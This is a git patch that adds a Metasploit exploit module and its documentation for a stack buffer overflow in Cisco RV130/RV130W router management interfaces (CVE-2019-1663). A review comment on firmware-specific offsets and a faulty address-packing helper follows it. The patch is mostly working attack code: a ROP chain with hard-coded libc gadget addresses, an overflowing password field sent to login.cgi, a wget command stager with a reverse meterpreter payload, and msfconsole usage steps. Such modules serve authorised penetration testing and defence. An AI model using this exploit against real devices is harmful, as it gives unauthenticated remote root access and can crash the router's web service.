From e53404b478108bed10cc948fcd354d0e3b4bd0d0 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Fri, 12 Apr 2019 14:06:51 -0500
Subject: [PATCH] Land #11613, Cisco RV130 stack BOF exploit

---
 .../exploit/linux/http/cisco_rv130_rmi_rce.md | 27 ++++
 .../linux/http/cisco_rv130_rmi_rce.rb | 149 ++++++++++++++++++
 2 files changed, 176 insertions(+)
 create mode 100644 documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md
 create mode 100644 modules/exploits/linux/http/cisco_rv130_rmi_rce.rb

diff --git a/documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md b/documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md
new file mode 100644
index 0000000000..6ad317ad1a
--- /dev/null
+++ b/documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md
@@ -0,0 +1,27 @@
+# Cisco RV130W Routers Management Interface Remote Command Execution
+
+A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
+
+The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
+
+A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
+system of the affected device as a high-privilege user.
+
+## Vulnerable Device
+
+* RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+* RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+
+This exploit was specifically written against version 1.0.3.28. To test, you can find the
+firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use exploit/linux/http/cisco_rv130_rmi_rce```
+3. ```set rhost [IP]```
+4. ```set payload linux/armle/meterpreter_reverse_tcp```
+5. ```set lhost [IP]```
+6. ```exploit```
+7. You should get a session
+
diff --git a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
new file mode 100644
index 0000000000..c8b0a57353
--- /dev/null
+++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# linux/armle/meterpreter/bind_tcp -> segfault
+# linux/armle/meterpreter/reverse_tcp -> segfault
+# linux/armle/meterpreter_reverse_http -> works
+# linux/armle/meterpreter_reverse_https -> works
+# linux/armle/meterpreter_reverse_tcp -> works
+# linux/armle/shell/bind_tcp -> segfault
+# linux/armle/shell/reverse_tcp -> segfault
+# linux/armle/shell_bind_tcp -> segfault
+# linux/armle/shell_reverse_tcp -> segfault
+#
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Cisco RV130W Routers Management Interface Remote Command Execution',
+      'Description' => %q{
+        A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router
+        could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
+
+        The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
+        An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
+
+        A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
+        system of the affected device as a high-privilege user.
+
+        RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+
+        Note: successful exploitation may not result in a session, and as such,
+        on_new_session will never repair the HTTP server, leading to a denial-of-service condition.
+      },
+      'Author' =>
+        [
+          'Yu Zhang', # Initial discovery
+          'Haoliang Lu', # Initial discovery
+          'T. Shiomitsu', # Initial discovery
+          'Quentin Kaiser ' # Vulnerability analysis & exploit dev
+        ],
+      'License' => MSF_LICENSE,
+      'Platform' => %w[linux],
+      'Arch' => [ARCH_ARMLE],
+      'SessionTypes' => %w[meterpreter],
+      'CmdStagerFlavor' => %w{ wget },
+      'Privileged' => true, # BusyBox
+      'References' =>
+        [
+          ['CVE', '2019-1663'],
+          ['BID', '107185'],
+          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
+        ],
+      'DefaultOptions' => {
+        'WfsDelay' => 10,
+        'SSL' => true,
+        'RPORT' => 443,
+        'CMDSTAGER::FLAVOR' => 'wget',
+        'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
+      },
+      'Targets' =>
+        [
+          [ 'Cisco RV130/RV130W < 1.0.3.45',
+            {
+              'offset' => 446,
+              'libc_base_addr' => 0x357fb000,
+              'system_offset' => 0x0004d144,
+              'gadget1' => 0x00020e79, # pop {r2, r6, pc};
+              'gadget2' => 0x00041308, # mov r0, sp; blx r2;
+              'Arch' => ARCH_ARMLE,
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Feb 27 2019',
+      'DefaultTarget' => 0,
+      'Notes' => {
+        'Stability' => [ CRASH_SERVICE_DOWN, ],
+      },
+    ))
+  end
+
+  def p (offset)
+    [(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse
+  end
+
+  def prepare_shellcode(cmd)
+    #All these gadgets are from /lib/libc.so.0
+    shellcode = rand_text_alpha(target['offset']) + # filler
+      p(target['gadget1']) +
+      p(target['system_offset']) + # r2
+      rand_text_alpha(4) + # r6
+      p(target['gadget2']) + # pc
+      cmd
+    shellcode
+  end
+
+  def send_request (payload)
+    begin
+      send_request_cgi({
+        'uri' => '/login.cgi',
+        'method' => 'POST',
+        'vars_post' => {
+          "submit_button": "login",
+          "submit_type": "",
+          "gui_action": "",
+          "wait_time": 0,
+          "change_action": "",
+          "enc": 1,
+          "user": "cisco",
+          "pwd": payload,
+          "sel_lang": "EN"
+        }
+      })
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
+    end
+  end
+
+  def exploit
+    print_status('Sending request')
+    execute_cmdstager
+  end
+
+  def execute_command(cmd, opts = {})
+    shellcode = prepare_shellcode(cmd.to_s)
+    send_request(shellcode)
+  end
+
+  def on_new_session(session)
+    # Given there is no process continuation here, the httpd server will stop
+    # functioning properly and we need to take care of proper restart
+    # ourselves.
+    print_status("Reloading httpd service")
+    reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
+    if session.type.to_s.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+      session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
+    else
+      session.shell_command(reload_httpd_service)
+    end
+  ensure
+    super
+  end
+end
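Review bot: The single `Targets` entry is labelled `Cisco RV130/RV130W < 1.0.3.45`, yet `libc_base_addr`, `system_offset`, `gadget1` and `gadget2` are absolute addresses from one build (the accompanying documentation says the module was written against 1.0.3.28) and nothing in the module verifies the firmware before the chain is sent, so with `Stability` already `CRASH_SERVICE_DOWN` a run against any other vulnerable-but-different build will most likely overwrite the saved return address with the wrong values and simply take httpd down. A `check` method that reads the firmware version from the device — if the management interface exposes it to an unauthenticated client, which I have not verified — and reports `Appears` only for the build these offsets were extracted from would turn that into an explicit operator decision; at minimum the target name, or a comment next to `'offset' => 446`, should state that the addresses are 1.0.3.28-specific. Separately, `def p (offset)` shadows `Kernel#p` for the whole module and builds the little-endian address by round-tripping through a hex string, which mis-packs any value whose hex form has an odd digit count; the idiomatic form is `[target['libc_base_addr'] + offset].pack('V')`.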